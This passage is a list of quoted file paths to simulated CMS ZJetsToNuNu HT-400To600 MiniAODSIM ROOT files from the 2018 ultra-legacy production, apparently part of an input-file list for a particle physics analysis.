'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/77DE401C-A3F3-3A4C-9EB2-508891707BFD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/785F8825-FDDE-A34E-B0BF-C435CD740CD8.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/79F9F9B3-09F3-8F4F-89E2-65B0936453A7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7A07F23E-683A-5A46-BC72-73AB728A755F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7A45290A-D464-B040-8255-D57002D45F2F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7C5CBDC0-9E56-1046-A52D-1CAA57C5ACBB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7CF55AD5-36CC-4140-969D-5FB68C4C4FFA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7E2CC139-3B2C-C644-8351-AD6A209C1D13.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7F041144-6CCD-A941-956D-7E8645178595.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7F5EE1A4-0915-4147-8AC6-B9361520C053.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/7F8D1DC4-F9E0-DA4C-835D-7DFF6A90192E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/80B1DD08-6183-EE4F-9C5F-2A3BD1646276.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/80DC33C1-D266-3044-A536-3965DB5AF726.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8293D432-51D7-5143-86B7-03293A9A02E9.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/82B625BB-48BE-2245-8426-52B794A25CB7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/82FD9101-6E53-AD44-AADC-B0AD025F4AC1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8545A55B-280A-8D45-A388-7F0651E5BDCC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8549D852-7D07-4841-B530-EA3485A3458E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/855D9595-9583-024D-B686-1A84952C52B2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/889863AA-391D-2649-8471-134DC95A767D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/88E60AAD-55D3-7D4A-9AB4-BCA6C9F3622E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/897CF060-79DC-C94C-9B28-B08763258639.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8A374375-1046-5D49-BFDE-61F6462AD7B0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8C7DDDB3-CD20-9743-8A3C-8D7A59BFF71F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8CBA46EC-71CF-3E47-9C11-D92EFDE34930.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8D890416-75E2-EE45-8096-5C60B9985075.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8D96DFFD-5324-034B-9408-00DBB11E2A8F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/8FF03CAC-015C-3941-B00A-B6E5FF60B653.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/906F2305-C28C-AE4F-B01A-DB38C0B83654.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/90A02574-6C17-5143-89F8-E64AC5AB9E76.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/912A9104-760F-974D-A5DF-135C09D2253F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/91F4C5AE-79FC-BF49-A88E-0B67E2C745AA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/921543AB-4531-E446-A8B9-27FC7ADDC2A1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9233134E-8CB1-9A42-8563-421802E2CFA2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/92C31CE6-9196-D84B-886B-BE4D6A53385E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/932105D0-E0A1-3241-92FD-A770C1AA310D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/93809296-EBC9-6645-B9FA-AA448ADD6003.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/93832687-1615-CF41-8AAF-D6E2AD2D8818.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/93AE8129-E453-0B49-A700-D1CC50E456D5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9550AF60-AA98-5041-94D8-A27F78426372.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/959F4A97-8B81-7E4B-BF76-94B881EF6411.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/963B32C1-4886-004A-963D-BEC6F359FCCF.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/96AABD73-E9EE-7043-B26A-08172487CFBC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/96BB3C3E-4F96-5947-8F3F-AB9F12723532.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/97A0834F-38B8-E44B-B6A8-A35B92B777E7.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9B03C1B6-C891-BB42-8B1C-F918D81AE067.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9B9C60A1-4C45-8143-A959-CDE12DC7538C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9D1AAA3B-9655-1847-8F0D-8C7FB1859491.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9F053492-3C5B-BE4E-8D8D-CF2BDC0A932C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9F64232C-75DC-C249-92D5-3050E5305ABA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9FB6744B-B4B0-E941-8CA7-87508E158C29.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/9FE7DFC7-C378-D14F-B2FF-1196C289015C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A021EBA2-C04F-AA42-8F7E-1029ED908FBB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A07F27CC-2948-E042-8290-9FAAC96E5E7E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A0B6CFA3-9304-F94B-9F65-F31618EB4790.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A1EDC2CF-3E9A-DC43-A04F-5B965CD92715.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A37F5C2D-4E4E-B548-8116-BD5D16363FEA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A41937CD-E91E-654F-9983-75E5A4835592.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A4656CF8-6CD0-EF48-9910-4EBA8EC505EB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A665F47D-71AF-5149-895C-C376F0F3F759.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A765DBD4-C24E-E74E-AB3E-ECA78927FFD2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A9065ED1-9A2F-9549-9175-49A21234ED6C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A9508C54-C7C9-554E-B411-DAD61D9028BA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A96B7967-6AB0-1D40-848C-06C4A4B46FCB.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A989B027-4067-BC45-A081-03BDEB09D438.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/A9B7F280-83C9-B04C-A474-97E80D655CDA.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AA42E045-D7D3-E548-9127-7C20ACB8DD32.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AA842A10-4EFA-C84D-8E67-1CD26005AA60.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AACE6CDC-C2A0-564D-B4D3-0639E0D1787C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AAEF0060-1674-EE47-BAC1-5928E6ECE2BC.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AC3CF156-4C78-BA43-9452-470E8552E071.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AC9E82B7-2BDB-2D4B-97C8-5DBD322C2EB2.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AD55FAF1-85A8-914C-BB10-655A73CF40BD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/ADCA98E2-E50D-8047-A6CD-CBD2F5245C84.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/AED09181-B446-2E42-BC8D-E6D32041E58E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B0539FFC-0772-0B48-8FC5-EF68027F0D8F.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B1E25F15-391E-3545-8883-76D11FF6FDB5.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B1E82694-B34F-2442-9286-C1827717400A.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B2062ED9-B6F4-9E4C-B9DF-CA386EC7C829.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B30B3A74-E05E-B942-BE88-D27BC42DEAE3.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B3AF44FD-659F-8641-9840-54E934C26971.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B41CD208-D8DB-9846-A2D9-42F3A3807D33.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B465A781-7833-EE41-8F53-664EFEC12864.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B4C1B4F6-D039-FB4D-A075-4E4229A07D51.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B5C4154B-C994-824E-8397-6E0BFA1470C0.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B5D35511-5D8B-5345-BC45-8646456F4579.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B5DC1FCF-A72B-D549-AE52-737A916F2EA6.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B62504AC-508F-F942-9DE3-C86BA8966A9D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B868154B-F6BA-F94F-99D2-CDC280A71701.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B8E81521-326F-DC4C-91D4-8DD46275D50D.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B9A4D574-D04A-9C46-8A64-7FFD3F6CA010.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/B9C25D0F-99E7-0541-B4EA-90389872DFF1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BA3F3369-D8CF-974E-AAC7-2CD56EF8DBC1.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BC1211B9-ECF6-D341-B324-86C69DDF81BD.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BC157EF2-7F8B-7740-B8D7-521740E7EE9B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BCCCE38A-25DD-6645-B262-D6617E497881.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BD9AB5CA-91AB-A947-B5C5-C6715A8A387B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BD9FF0E9-89DC-A849-834F-7B4B2770F08C.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BEC48540-56F2-2D40-9A6B-426A35257E13.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BF4A118D-8E92-F84C-86E7-7312A289D471.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/BFFC965D-144B-4043-8BD9-F7C9D6D5A383.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C03D375F-8DEB-5C45-96D6-14AF284CE722.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C08F3A28-1139-834C-AF2D-94B3C07D9071.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C1311B3D-F620-5440-90FB-286693B3B708.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C26D8CED-AC18-C742-9712-BABB21C42D20.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C2A105B2-460E-8146-9B5C-7BD0A04C1C0E.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C3129C89-8AFD-F84F-8B10-4A1D8C00DB46.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C3189655-0725-8944-BDFB-8DB6E65B1A2B.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C347C2DB-A7E2-274E-9D16-1EF089CB4C61.root',
'/store/mc/RunIISummer20UL18MiniAODv2/ZJetsToNuNu_HT-400To600_TuneCP5_13TeV-madgraphMLM-pythia8/MINIAODSIM/106X_upgrade2018_realistic_v16_L1v1-v1/280000/C4C79A1D-5F03-114E-997A-9DAAA5561A52.root',
